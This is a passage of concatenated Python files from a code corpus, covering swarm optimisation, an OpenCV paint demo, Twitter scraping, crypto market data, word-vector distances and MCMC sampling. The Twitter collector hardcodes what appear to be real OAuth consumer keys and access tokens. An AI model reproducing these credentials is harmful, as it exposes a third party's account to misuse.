nextParticle = None\n if idx is 0:\n # Previous is last, next is next\n nextParticle = swarm._particles[idx + 1]\n previousParticle = swarm._particles[len(swarm._particles) - 1]\n elif idx is len(swarm._particles) - 1:\n # Previous is previous, next is first\n nextParticle = swarm._particles[0]\n previousParticle = swarm._particles[idx - 1]\n else:\n # Previous is previous, next is 
next\n nextParticle = swarm._particles[idx + 1]\n previousParticle = swarm._particles[idx - 1]\n neighbourhoods.append(NeighbourhoodModel([previousParticle, curParticle, nextParticle]))\n return neighbourhoods\n","sub_path":"PSOModel.py","file_name":"PSOModel.py","file_ext":"py","file_size_in_byte":9084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"327536638","text":"# encoding: utf-8\n\n\"\"\"\n2018-7-16 20:56, track_bar.py created by wq.\n\"\"\"\n\n# 把滑动条绑定到 OpenCV窗口。通过调节滑动条,调节画板颜色。\nimport cv2\nimport numpy as np\n\nr_1 = 0\ng_1 = 0\nb_1 = 0\n\n\ndef nothing(x):\n pass\n\n\n# 画图监听,监听鼠标事件(包括鼠标事件和事件发生位置)\ndef draw_listener(event, x, y, flags, param):\n global r_1, g_1, b_1\n if event == cv2.EVENT_LBUTTONDBLCLK:\n cv2.circle(img, (x, y), 30, (r_1, g_1, b_1), -1)\n\n\n# 创建一副黑色图像\nimg = np.zeros((300, 512, 3), np.uint8)\ncv2.namedWindow(\"canvas\")\n\n# 创建四个滑动条,参数分别是:名称、所属窗口,默认值、最大值、滑动过程同步回调函数\ncv2.createTrackbar('R', \"canvas\", 0, 255, nothing)\ncv2.createTrackbar('G', \"canvas\", 0, 255, nothing)\ncv2.createTrackbar('B', \"canvas\", 0, 255, nothing)\n\nswitch = '0:OFF\\n1:ON'\ncv2.createTrackbar(switch, \"canvas\", 0, 1, nothing)\n\n# 设置鼠标监听\ncv2.setMouseCallback(\"canvas\", draw_listener) # 为鼠标事件设置监听回调函数\n\nwhile 1:\n cv2.imshow(\"canvas\", img)\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\n\n r = cv2.getTrackbarPos(\"R\", 'canvas')\n g = cv2.getTrackbarPos(\"G\", 'canvas')\n b = cv2.getTrackbarPos(\"B\", 'canvas')\n s = cv2.getTrackbarPos(switch, 'canvas')\n\n # 禁止 各个滑动条的功能\n if s == 0:\n img[:] = 0\n # 使能各个滑动条的功能,将 img 的所有像素改成 BGR\n else:\n r_1, g_1, b_1 = b, g, r\n\ncv2.destroyAllWindows()\n","sub_path":"part_5_trackbar/track_paint.py","file_name":"track_paint.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"342754815","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nfrom tweepy import API\nfrom tweepy import Cursor\nimport csv\nimport datetime\n\nclass TwitterClient:\n def __init__(self, handle=None):\n a= Authentication()\n self.auth = a.twitterAuthentication()\n self.twitterClient = API(self.auth, wait_on_rate_limit=True)\n self.handlefortimeline = handle\n\n def get_tweets_of_someone(self):\n today = datetime.datetime.today()\n yesterday = today - datetime.timedelta(days=1)\n prevFileName = \"tweets-\"+str(self.handlefortimeline)+'-'+str(yesterday.date())+'.csv'\n prevfile = './Resources/Tweets/'+prevFileName\n openFile = open(prevfile,'r')\n csvReader = csv.reader(openFile)\n firstRow = []\n firstRow = next(csvReader)\n from_id = firstRow[1]\n openFile.close()\n newFileName = \"tweets-\"+str(self.handlefortimeline)+'-'+str(today.date())+'.csv'\n newfile = './Resources/Tweets/'+newFileName\n csvFile = open(newfile,'w',newline='')\n csvWriter = csv.writer(csvFile)\n print(self.handlefortimeline,from_id)\n for tweet in Cursor(self.twitterClient.user_timeline, id = self.handlefortimeline, since_id = from_id).items(100):\n csvWriter.writerow([tweet.created_at,tweet.id,tweet.text.encode('utf-8')])\n csvFile.close()\n\n def find_replies_to_tweets(self):\n today = datetime.datetime.today()\n yesterday = today - datetime.timedelta(days=1)\n prevFileName = \"tweets-\"+str(self.handlefortimeline)+'-'+str(yesterday.date())+'.csv'\n prevfile = './Resources/tweets/'+prevFileName\n openFile = open(prevfile,'r')\n csvReader = csv.reader(openFile)\n for row in 
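# The ParticleModel.updatePosition method above is built on the canonical PSO
# velocity rule v = w*v + c1*r1*(pbest - x) + c2*r2*(gbest - x) before it
# discretises positions through a sigmoid. A minimal continuous sketch with
# illustrative names (the snippet itself varies the gbest term):
import numpy as np

def pso_step(x, v, pbest, gbest, w=0.7, c1=1.5, c2=1.5):
    r1, r2 = np.random.rand(2)
    v = w * v + c1 * r1 * (pbest - x) + c2 * r2 * (gbest - x)
    return x + v, v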
csvReader:\n id = row[1]\n newFileName = \"replies-\"+str(self.handlefortimeline)+'-'+'for_tweet_id-'+id+'-'+str(today.date())+'.csv'\n newfile = './Resources/Replies/'+newFileName\n csvFile = open(newfile,'w',newline='')\n csvWriter = csv.writer(csvFile)\n for_user = 'to:'+self.handlefortimeline\n for tweet in Cursor(self.twitterClient.search,q=for_user, since_id=id).items(200):\n if hasattr(tweet, 'in_reply_to_status_id_str'):\n if (tweet.in_reply_to_status_id_str==id):\n csvWriter.writerow([tweet.created_at,tweet.id,tweet.text.encode('utf-8'),tweet.in_reply_to_status_id_str])\n csvFile.close()\n openFile.close()\n\nclass Authentication:\n\n def twitterAuthentication(self):\n auth = OAuthHandler(\"YO3onH8vbakEW2ZCzaXbx01VW\", \"FsupJ0Cu595QPXPswPWbmetm6ktZSy86QXN4TN3aHa3AdrVSU9\")\n auth.set_access_token(\"42595577-IRgFyBq8btWa50H11GZIwE6EexFjQI2lmLGh5gOTV\", \"lxhe0unY42ZMF5bH9CLv7K9ioeoiSkM7PaPqQ2tDf6m0v\")\n return auth\n\n\nif __name__ == '__main__':\n file = \"./Resources/Handles.csv\"\n handles=[]\n with open(file,'r') as csvFile:\n csvReader = csv.reader(csvFile)\n for row in csvReader:\n handles.append(row[0])\n csvFile.close()\n for handle in handles:\n print(handle)\n tc = TwitterClient(handle)\n tc.get_tweets_of_someone()\n tc.find_replies_to_tweets()\n","sub_path":"Data_Collection.py","file_name":"Data_Collection.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462394367","text":"# coding: utf-8\n# Módulo 1 - Coletando e Armazenando dados históricos do mercado\n\n\"\"\"\nDeve ler o arquivo de dados de mercado, caso exista, ou criá-lo a partir de dados da corretora, respeitando os \nparâmetros do arquivo de parâmetros.\n\"\"\"\n\nimport sys\nimport os\n\nsys.path.append(os.getcwd().split(sep=\"modules\")[0])\nimport modules\nfrom modules import func\n\nfrom datetime import datetime\nfrom datetime import date\nimport pandas as pd\n\ndef prod (param):\n \"\"\"\n Retorna o framework de trabalho, 'dados', bem como uma variável de controle ('time_aq_comp') a fim de startar \n ou não a estratégia do módulo seguinte.\n \"\"\"\n \n par = param[1].split()[2]; candle = param[0].split()[2]; time_aq = param[12].split('=')[1][1:]; datapath = str(param[4].split()[2]).format(par,candle); data_name = 'dados.csv'\n candle_ent = '{}m'.format(candle)\n\n try:\n dados = pd.read_csv(datapath+data_name, index_col='Open_time', parse_dates=['Open_time','Close_time'], infer_datetime_format=True) \n\n print('dados lidos') #TESTE, APAGAR DEPOIS DE OK\n \n dif_minut = abs(float(((datetime.now() - dados.Close_time[len(dados)-1]).total_seconds() - 1)/60)) #Tirando 1s fica ok\n\n if (dif_minut > float(candle)): \n \n time_aq = '{} minute ago UTC'.format(int(dif_minut) + int(candle))\n time_aq_comp = '{} minute ago UTC'.format(int(dif_minut)) #Necessário apenas para msg de controle\n \n #Faz a solicitação do complemento do dado\n hist_complem = func.data_historico(par, candle_ent, time_aq)\n \n #Junta os dataframes\n dados = dados.append(hist_complem) \n \n #Despreza a última amostra caso o fechamento do último candle seja maior que o presente\n if ( dados.Close_time[len(dados)-1] > datetime.now() ): dados = dados.iloc[:len(dados)-1] \n \n mess = 'Foi preciso completar o dado em {}'.format(time_aq_comp) #TESTE, APAGAR DEPOIS DE OK\n print(mess) #TESTE, APAGAR DEPOIS DE OK\n \n #Não foi preciso completar o dado, pois o candle fechado já foi analisado.\n else:\n time_aq = 'bypass'\n print('Não foi preciso 
completar o dado, pois o último candle fechado já foi analisado.') #TESTE, APAGAR DEPOIS DE OK\n \n #NÃO Encontra o arquivo dados.csv na pasta, ENTÃO Cria o arquivo até o instante atual.\n except:\n mess = 'Arquivo não encontrado, criando arquivo de dados.' #TESTE, APAGAR DEPOIS DE OK\n print(mess) #TESTE, APAGAR DEPOIS DE OK\n \n dados = func.data_historico(par, candle_ent, time_aq)\n \n #Despreza a última amostra caso o fechamento do último candle seja maior que o presente\n if ( dados.Close_time[len(dados)-1] > datetime.now() ): dados = dados.iloc[:len(dados)-1]\n \n #Salva os dados históricos\n dados.to_csv(datapath+data_name, index=True, index_label='Open_time', date_format='%Y-%m-%d %H:%M:%S') \n\n return dados, time_aq","sub_path":"app/backend/modules/update_stock_data/binance.py","file_name":"binance.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"407261458","text":"# Adding a eud_b_weighted, which, unlike eud_weighted, is obtained by calculating the square root of weighted Euclidean distance squared. \n# This program calculates the weighted cosine, sine, Euclidean distance and Euclidean distance squared. \nimport math, csv, cPickle as pickle\nfrom mylibrary import invert, parseinterval, weightedavg\nfrom lists import windows\n\n# load words_nonzero, cos, sin\nwith open('words_nonzero.pickle','rb') as words_nonzerosave:\n words_nonzero = pickle.load(words_nonzerosave)\nwith open('cos.pickle','rb') as cossave:\n cos = pickle.load(cossave)\nwith open('sin.pickle','rb') as sinsave:\n sin = pickle.load(sinsave)\nwith open('eud.pickle','rb') as eudsave:\n eud = pickle.load(eudsave)\nwith open('eudsq.pickle','rb') as eudsqsave:\n eudsq = pickle.load(eudsqsave)\n\n# specify the intervals of words, windows to include\n# the words come from: words_nonzero, not words any more\ninterval_words = raw_input('Specify the index intervals of words to include, within [0, %s], separated by semicolon: ' %str(len(words_nonzero)-1))\nwindows_toinclude = raw_input('Choose from windows %s, separated by comma: ' %str(windows)).split(',')\n\n# specify weighting of each window\nweights = map(float, raw_input('Specify weighting for each window, separated by comma: ').split(','))\n\n# convert intervals into indices pointing to corresponding lists or dictionaries\nindices_words = parseinterval(interval_words)\n\n# parse windows values back to relative positions, that is, -2:0, -1:1...\nindices_windows = []\nfor window in windows_toinclude:\n t = int(window)\n if t < 0:\n indices_windows.append(t+2)\n else:\n indices_windows.append(t+1)\n\n# create sublists from indices: a list of words, and a list of their corresponding indices in words_nonzero\nwords_toinclude = []\nindices_toinclude = []\nfor index_words in indices_words:\n i = index_words[0]\n while i <= index_words[1]:\n words_toinclude.append(words_nonzero[i])\n indices_toinclude.append(i)\n i += 1\n\n# calculate the weighted cosine, sine, Euclidean distance and Euclidean distance squared\ncos_weighted = {}\nsin_weighted = {}\neud_weighted = {}\neudsq_weighted = {}\neud_b_weighted = {}\nfor word in words_toinclude:\n cos_weighted[word] = []\n sin_weighted[word] = []\n eud_weighted[word] = []\n eudsq_weighted[word] = []\n eud_b_weighted[word] = []\n for i in indices_toinclude:\n cos_raw = []\n sin_raw = []\n eud_raw = []\n eudsq_raw = []\n for window in indices_windows:\n cos_raw.append(cos[word][window][i])\n sin_raw.append(sin[word][window][i])\n 
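# Illustrative aside (not from the original file): eud_b_weighted, appended
# further below as sqrt(weightedavg of squared distances), is a quadratic mean
# over the windows, so it is always >= eud_weighted, the plain weighted mean of
# the distances; the two agree only when every window reports the same value.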
eud_raw.append(eud[word][window][i])\n eudsq_raw.append(eudsq[word][window][i])\n cos_pikapika = weightedavg(cos_raw, weights)\n sin_pikapika = weightedavg(sin_raw, weights)\n eud_pikapika = weightedavg(eud_raw, weights)\n eudsq_pikapika = weightedavg(eudsq_raw, weights)\n if cos_pikapika > 1.0:\n cos_pikapika = 1\n elif cos_pikapika < 0.00001:\n cos_pikapika = 0\n if sin_pikapika > 1.0:\n sin_pikapika = 1\n elif sin_pikapika < 0.00001:\n sin_pikapika = 0\n if eud_pikapika > math.sqrt(2):\n eud_pikapika = math.sqrt(2)\n elif eud_pikapika < 0.00001:\n eud_pikapika = 0\n if eudsq_pikapika > math.sqrt(2):\n eudsq_pikapika = math.sqrt(2)\n elif eudsq_pikapika < 0.00001:\n eudsq_pikapika = 0\n cos_weighted[word].append(cos_pikapika)\n sin_weighted[word].append(sin_pikapika)\n eud_weighted[word].append(eud_pikapika)\n eudsq_weighted[word].append(eudsq_pikapika)\n eud_b_weighted[word].append(math.sqrt(eudsq_pikapika))\n\n# write to csv\nwith open('cos_weighted.csv','wb') as cos_weightedsave:\n writer = csv.writer(cos_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(cos_weighted[word])\nwith open('sin_weighted.csv','wb') as sin_weightedsave:\n writer = csv.writer(sin_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(sin_weighted[word])\nwith open('eud_weighted.csv','wb') as eud_weightedsave:\n writer = csv.writer(eud_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(eud_weighted[word])\nwith open('eudsq_weighted.csv','wb') as eudsq_weightedsave:\n writer = csv.writer(eudsq_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(eudsq_weighted[word])\nwith open('eud_b_weighted.csv','wb') as eud_b_weightedsave:\n writer = csv.writer(eud_b_weightedsave, dialect = 'excel')\n writer.writerow(words_toinclude)\n for word in words_toinclude:\n writer.writerow(eud_b_weighted[word])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"263000989","text":"\"\"\"\nBracketHighlighter.\n\nCopyright (c) 2013 - 2016 Isaac Muse \nLicense: MIT\n\"\"\"\nimport re\n\nRE_DEF = re.compile(r\"\\s*(?:(?:private|public|protected)\\s+)?(def).*?\")\nRE_KEYWORD = re.compile(r\"(\\s*\\b)[\\w\\W]*\")\nSPECIAL_KEYWORDS = ('do',)\nNORMAL_KEYWORDS = ('for', 'until', 'unless', 'while', 'class', 'module', 'if', 'begin', 'case')\n\n\ndef post_match(view, name, style, first, second, center, bfr, threshold):\n \"\"\"Strip whitespace from being targeted with highlight.\"\"\"\n\n if first is not None:\n # Strip whitespace from the beginning of first bracket\n open_bracket = bfr[first.begin:first.end]\n if open_bracket not in SPECIAL_KEYWORDS:\n open_bracket_stripped = open_bracket.strip()\n if open_bracket_stripped not in NORMAL_KEYWORDS:\n m = RE_DEF.match(open_bracket)\n if m:\n first = first.move(first.begin + m.start(1), first.begin + m.end(1))\n else:\n m = RE_KEYWORD.match(open_bracket)\n if m:\n first = first.move(first.begin + m.end(1), first.end)\n return first, second, style\n","sub_path":"bh_modules/rubykeywords.py","file_name":"rubykeywords.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"640519345","text":"import datetime\nfrom 
dateutil.relativedelta import relativedelta\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\n\nfrom botcoin.common.events import MarketEvent\nfrom botcoin.utils import round, is_dataframe_good, delta_is_one_business_day, now, pad_empty_df_values\n\nclass MarketData(object):\n \"\"\" General MarketData that is subclassed in both live and backtest modes. \"\"\"\n\n def __init__(self, csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size=None):\n\n if not symbol_list:\n raise ValueError(\"Empty SYMBOL_LIST\")\n\n if bar_size and type(bar_size) not in (datetime.timedelta, relativedelta):\n raise ValueError(\"Bar size needs to be datetime.timedelta or dateutil.relativedelta\")\n\n # To keep track how long loading everything took\n start_load_datetime = now()\n self.symbol_list = sorted(list(set(symbol_list)))\n self.bar_size = bar_size\n self.csv_dir = csv_dir\n\n # Dictionary where all symbol data is kept\n self._data = {}\n # Maintains last date found for each symbol file\n self._last_historical_bar_for = {}\n\n # Parsing csvs, treating data and setting bars\n self._read_all_csvs(csv_dir, normalize_prices, normalize_volume, bar_size)\n\n # Last datetime in historical data after index is combined, meaning datetime can be from any symbol\n self.last_historical_bar_at = self._data[self.symbol_list[0]]['df'].index[-1]\n\n self.load_time = now()-start_load_datetime\n\n def _read_all_csvs(self, csv_dir, normalize_prices, normalize_volume, bar_size):\n\n comb_index = None\n\n for s in self.symbol_list:\n\n self._data[s] = {}\n filename = s + '.csv'\n\n self._data[s]['df'] = self._read_csv(csv_dir, filename, normalize_prices, normalize_volume, bar_size)\n\n if not is_dataframe_good(s, self._data[s]['df'], self.bar_size):\n raise ValueError('Inconsistencies found in data, aborting')\n\n self._last_historical_bar_for[s] = self._data[s]['df'].index[-1]\n\n # Combine different file indexes to account for nonexistent values\n # (needs 'is not None' because of Pandas 'The truth value of a DatetimeIndex is ambiguous.' 
error)\n comb_index = comb_index.union(self._data[s]['df'].index) if comb_index is not None else self._data[s]['df'].index\n\n # Reindex\n for s in self.symbol_list:\n self._data[s]['df'] = self._data[s]['df'].reindex(index=comb_index, method=None)\n\n # Pad empty values\n for s in self.symbol_list:\n self._data[s]['df'] = pad_empty_df_values(self._data[s]['df'])\n\n @staticmethod\n def _read_csv(csv_dir, filename, normalize_prices, normalize_volume, bar_size):\n\n df = pd.io.parsers.read_csv(\n os.path.expanduser(csv_dir+filename),\n header=None,\n index_col=0,\n names=['datetime', 'open', 'high', 'low', 'close', 'volume', 'adj_close']\n )\n\n try:\n # Tries to index with %Y-%m-%d %H:%M:%S format\n df.index = pd.to_datetime(df.index, format='%Y-%m-%d %H:%M:%S')\n except ValueError:\n # On ValueError try again with %Y-%m-%d\n df.index = pd.to_datetime(df.index, format='%Y-%m-%d')\n\n # Resamples data if bar_size is 'MONTHLY', otherwise leaves it as is (supposedly daily)\n if bar_size == relativedelta(months=1):\n # Resample to monthly bar_size\n df = df.resample('M', how={'open':'first','high':'max','low':'min','close': 'last','volume': 'sum','adj_close': 'last'})\n elif bar_size == relativedelta(weeks=1):\n # Resample to weekly bar_size\n df = df.resample('w', how={'open':'first','high':'max','low':'min','close': 'last','volume': 'sum','adj_close': 'last'})\n\n\n # Reorder elements if resampling was necessary \n df = df[['open', 'high', 'low', 'close', 'volume', 'adj_close']]\n \n if not df['adj_close'].isnull().all():\n # Rounding adj_close to prevent rounding problems when low == close\n df['adj_close'] = df['adj_close'].apply(round)\n\n # Normalizing prices and volume based on adj_close prices\n if normalize_volume:\n df['volume'] = df['volume']*(df['adj_close']/df['close'])\n if normalize_prices:\n for c in ('open', 'high', 'low'):\n df[c] = df[c]*(df['adj_close']/df['close'])\n df['close'] = df['adj_close']\n\n # Rounding prices\n for c in ('open', 'high', 'low', 'close'):\n df[c] = df[c].apply(round)\n\n return df\n\n def _current_bar(self, symbol):\n \"\"\" Returns the current bar's prices, volume and last_timestamp as an ordered tuple. 
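# The _read_csv helper above resamples daily bars with the old dict-valued
# `how=` argument, which later pandas versions removed. A sketch of the same
# monthly OHLCV aggregation in current pandas (column names from the snippet,
# everything else illustrative):
import pandas as pd

def resample_ohlcv(df, rule='M'):
    return df.resample(rule).agg({'open': 'first', 'high': 'max', 'low': 'min',
                                  'close': 'last', 'volume': 'sum',
                                  'adj_close': 'last'})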
\"\"\"\n return (\n self._data[symbol]['date'],\n self._data[symbol]['open'],\n self._data[symbol]['high'],\n self._data[symbol]['low'],\n self._data[symbol]['close'],\n self._data[symbol]['volume'],\n )\n\n def now(self):\n return self.updated_at\n\n def last_price(self, symbol):\n \"\"\" Returns last recorded price \"\"\"\n if not 'close' in self._data[symbol]:\n raise BarError(\"No price recorded for {} today\".format(symbol))\n return self._data[symbol]['close']\n\n def bars(self, symbol, N):\n # Returns latest N bars including current bar\n return self._bar_dispatcher('bars', symbol, N)\n\n def past_bars(self, symbol, N):\n # Returns latest N bars not including current bar\n return self._bar_dispatcher('past_bars', symbol, N)\n\n def current_bar(self, symbol):\n # Returns current bar's OHLC\n return self._bar_dispatcher('current_bar', symbol)\n\n def last_bar(self, symbol):\n # Returns last_bar's values\n return self._bar_dispatcher('last_bar', symbol)\n\n def _bar_dispatcher(self, option, symbol, N=1, ):\n if option == 'current_bar':\n bars = [self._current_bar(symbol)]\n\n elif option == 'last_bar':\n bars = self._data[symbol]['latest_bars'][-1:]\n\n elif option == 'bars':\n bars = self._data[symbol]['latest_bars'][-(N-1):]\n bars.append(self._current_bar(symbol))\n\n elif option == 'past_bars':\n bars = self._data[symbol]['latest_bars'][-N:]\n\n if not bars:\n raise BarError(\"Something wrong with latest_bars\")\n\n if len(bars) != N:\n raise BarError(\"Not enough bars yet.\")\n\n if len([bar for bar in bars if bar[4] > 0.0]) != len(bars):\n raise BarError(\"Empty bars found. Latest_bars for {} has one or more 0.0 close prices, and will be disconsidered.\".format(symbol))\n\n return Bars(bars, True) if option in ('current_bar', 'last_bar') else Bars(bars)\n\n\nclass Bars(object):\n \"\"\"\n Object exposed to users to reflect prices on a single or on multiple days.\n \"\"\"\n def __init__(self, latest_bars, single_bar=False):\n self.length = len(latest_bars)\n\n if single_bar:\n self.date = latest_bars[-1][0]\n self.open = latest_bars[-1][1]\n self.high = latest_bars[-1][2]\n self.low = latest_bars[-1][3]\n self.close = latest_bars[-1][4]\n self.volume = latest_bars[-1][5]\n self.is_positive = True if self.close > self.open else False\n else:\n self.date = [i[0] for i in latest_bars]\n self.open = [i[1] for i in latest_bars]\n self.high = [i[2] for i in latest_bars]\n self.low = [i[3] for i in latest_bars]\n self.close = [i[4] for i in latest_bars]\n self.volume = [i[5] for i in latest_bars]\n self.returns = (self.close[-1] - self.open[0])/self.open[0]\n\n def mavg(self, price_type='close'):\n return round(np.mean(getattr(self, price_type)))\n\n def bollingerbands(self, k, price_type='close'):\n ave = np.mean(getattr(self, price_type))\n sd = np.std(getattr(self, price_type))\n upband = ave + (sd*k)\n lwband = ave - (sd*k)\n return round(ave), round(upband), round(lwband)\n\n def __len__(self):\n return self.length\n\nclass BarError(Exception):\n \"\"\" Required for a specific type of Error that is catched on portfolio. 
\"\"\"\n pass\n\n\nclass BacktestMarketData(MarketData):\n\n def __init__(self, csv_dir, symbol_list, normalize_prices, normalize_volume,\n date_from, date_to, bar_size):\n\n super(BacktestMarketData, self).__init__(csv_dir,symbol_list, normalize_prices, normalize_volume, bar_size)\n\n for s in symbol_list:\n # Limit between date_From and date_to\n self._data[s]['df'] = self._data[s]['df'][date_from:] if date_from else self._data[s]['df']\n self._data[s]['df'] = self._data[s]['df'][:date_to] if date_to else self._data[s]['df']\n\n # Check for empty dfs\n if self._data[s]['df'].empty:\n logging.warning(\"Empty DataFrame loaded for {}.\".format(s)) # Possibly invalid date ranges?\n\n # Dataframe iterrows generator\n self._data[s]['bars'] = self._data[s]['df'].iterrows()\n\n # List that will hold all rows from iterrows, one at a time\n self._data[s]['latest_bars'] = []\n\n self.continue_execution = True\n self.date_from = self._data[self.symbol_list[0]]['df'].index[0]\n self.date_to = self._data[self.symbol_list[0]]['df'].index[-1]\n\n def _simulate_walk_in_time(self):\n \"\"\"\n Generator that updates all prices based on historical data and raises\n MarketEvents to simulate live trading. The order of events is:\n before_open - open - close - after_close\n \"\"\"\n try:\n # Before day starts, adding bars from yesterday to 'latest_bars'\n for s in self.symbol_list:\n if hasattr(self, 'updated_at'):\n self._data[s]['latest_bars'].append(self._current_bar(s))\n\n cached_values = {s:{} for s in self.symbol_list}\n\n for s in self.symbol_list:\n new_row = next(self._data[s]['bars'])\n\n self._data[s]['date'] = new_row[0]\n cached_values[s]['open'] = new_row[1][0]\n cached_values[s]['high'] = new_row[1][1]\n cached_values[s]['low'] = new_row[1][2]\n cached_values[s]['close'] = new_row[1][3]\n cached_values[s]['volume'] = new_row[1][4]\n\n self.updated_at = new_row[0]\n\n yield MarketEvent('before_open')\n\n for s in self.symbol_list:\n # Pretend you don't know the future :)\n self._data[s]['open'] = cached_values[s]['open']\n self._data[s]['high'] = cached_values[s]['open']\n self._data[s]['low'] = cached_values[s]['open']\n self._data[s]['close'] = cached_values[s]['open']\n self._data[s]['volume'] = 0\n\n yield MarketEvent('on_open')\n\n for s in self.symbol_list:\n self._data[s]['open'] = cached_values[s]['open']\n self._data[s]['high'] = cached_values[s]['high']\n self._data[s]['low'] = cached_values[s]['low']\n self._data[s]['close'] = cached_values[s]['close']\n self._data[s]['volume'] = cached_values[s]['volume']\n\n yield MarketEvent('on_close')\n\n yield MarketEvent('after_close')\n\n except StopIteration:\n self.continue_execution = False\n\n\nclass LiveMarketData(MarketData):\n def __init__(self, events_queue, csv_dir, symbol_list, normalize_prices,\n normalize_volume, symbol_suffix, historical_data_source, bar_size):\n\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n\n self.events_queue = events_queue\n\n assert(datetime.timedelta(days=1)%self.bar_size == datetime.timedelta(0))\n\n if historical_data_source == 'IB':\n\n # Tries to load files. 
If any file doesn't exist, tries to download all symbols\n try:\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n except OSError:\n download_historical_data(symbol_list, symbol_suffix, csv_dir, historical_data_source)\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n\n # Checks if latest combined datetime is only one business day away from today\n # If it isn't, will try to download all symbols\n if not delta_is_one_business_day(now(), self.last_historical_bar_at):\n download_historical_data(symbol_list, symbol_suffix, csv_dir, historical_data_source)\n super(LiveMarketData, self).__init__(csv_dir, symbol_list, normalize_prices, normalize_volume, bar_size)\n\n # If delta is still not one business day after download, something is wrong\n if not delta_is_one_business_day(now(), self.last_historical_bar_at):\n raise ValueError('historical data still out of date after download')\n\n # Checks if last date recorded for each individual symbol is behind last combined datetime\n for symbol in symbol_list:\n if self._last_historical_bar_for[symbol] != self.last_historical_bar_at:\n logging.error(\"Latest {} data ({}) is behind current combined index {}.\".format(symbol, self._last_historical_bar_for[symbol], self.last_historical_bar_at))\n\n # Adds 'df' to 'latest_bars' as list of lists, just as in historical update_bars\n for s in self.symbol_list:\n self._data[s]['latest_bars'] = self._data[s]['df'].reset_index()[['datetime', 'open', 'high', 'low', 'close', 'volume']].values.tolist()\n\n # Defines which bar date we are waiting for before issuing the next MarketEvent\n d = datetime.date.today()\n today = datetime.datetime(d.year, d.month, d.day, tzinfo=datetime.timezone.utc)\n for i in range(datetime.timedelta(days=1)//self.bar_size):\n if now() < today + self.bar_size*i:\n self.waiting_for_bar_date = today + self.bar_size*i\n logging.info('Current bar is {}, awaiting {} for market event'.format(self.waiting_for_bar_date-self.bar_size, self.waiting_for_bar_date))\n break\n\n def _generate_market_events(self):\n if now() > self.waiting_for_bar_date:\n if not [symbol for symbol in self.subscribed_symbols if self.current_bar(symbol).date < self.waiting_for_bar_date]:\n self.waiting_for_bar_date = self.waiting_for_bar_date + self.bar_size\n self.events_queue.put(MarketEvent('on_close'))\n\n def _update_from_bars(self, e):\n symbol = e.symbol\n df = e.df\n latest_reported_bar_date = df.index[-1].to_datetime()\n current_bar_date = self.current_bar(symbol).date\n\n try:\n assert(now() > latest_reported_bar_date)\n assert(now() <= (latest_reported_bar_date+self.bar_size) + datetime.timedelta(seconds=0.5)) # 0.5 seconds added for leeway\n except AssertionError as e:\n logging.critical('{}, {}, {}'.format(now(), latest_reported_bar_date, latest_reported_bar_date+self.bar_size))\n raise(e)\n\n past_bars = df[:-1]\n current_bar = df[-1:].iloc()[0]\n\n self._data[symbol]['df'] = past_bars\n self._data[symbol]['latest_bars'] = past_bars.reset_index()[['datetime', 'open', 'high', 'low', 'close', 'volume']].values.tolist()\n self._data[symbol]['open'] = current_bar['open']\n self._data[symbol]['high'] = current_bar['high']\n self._data[symbol]['low'] = current_bar['low']\n self._data[symbol]['close'] = current_bar['close']\n self._data[symbol]['volume'] = current_bar['volume']\n self._data[symbol]['date'] = latest_reported_bar_date\n\n def _update_from_tick(self, e):\n symbol = e.symbol\n for updated_field_type, updated_value in 
e.values_dict.items():\n\n self._data[symbol][updated_field_type] = updated_value\n self.updated_at = now()\n\n if 'close' in e.values_dict:\n self.events_queue.put(MarketEvent('on_tick', symbol))\n\n","sub_path":"botcoin/common/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":16402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"158681646","text":"import numpy as np\nimport scipy as sp\nimport numpy.linalg as npla\nimport scipy.linalg as scla\nfrom scipy import stats as st\nfrom scipy.integrate import ode\nimport sys\nimport matplotlib.pyplot as plt\nimport time\n\nnp.seterr(all='ignore')\n\nclass Sampler(list):\n def __init__(self,dat,prior,like,start,chains=4,sampler_type=1,size=1, fwdMod=lambda x: x, S=np.array([]), fS=np.array([])):\n self.chains= chains\n self.size = size\n\n for i in range(0,chains):\n if sampler_type == 1:\n self.append(MetHastChain_NormProp(dat,lambda x: prior(x)*like(x),start,size))\n\n elif sampler_type == 2:\n self.append(ShrinkingBullseyeChain_NormProp(dat,prior,like,fwdMod,start,S,fS,size))\n\n def burn(self,var,N=1):\n for i in range(0,self.chains):\n self[i].burn(var,N)\n\n def sample(self,var,N=1):\n for chain in self:\n size=40\n sys.stdout.write(\"[%s]\" % (\" \" * 20))\n sys.stdout.flush()\n sys.stdout.write('\\b'*(size+2))\n for i in range(0,N):\n chain.update(var)\n\n count = int((size*1.0*i)/N)+1\n sys.stdout.write('['+'='*count+' 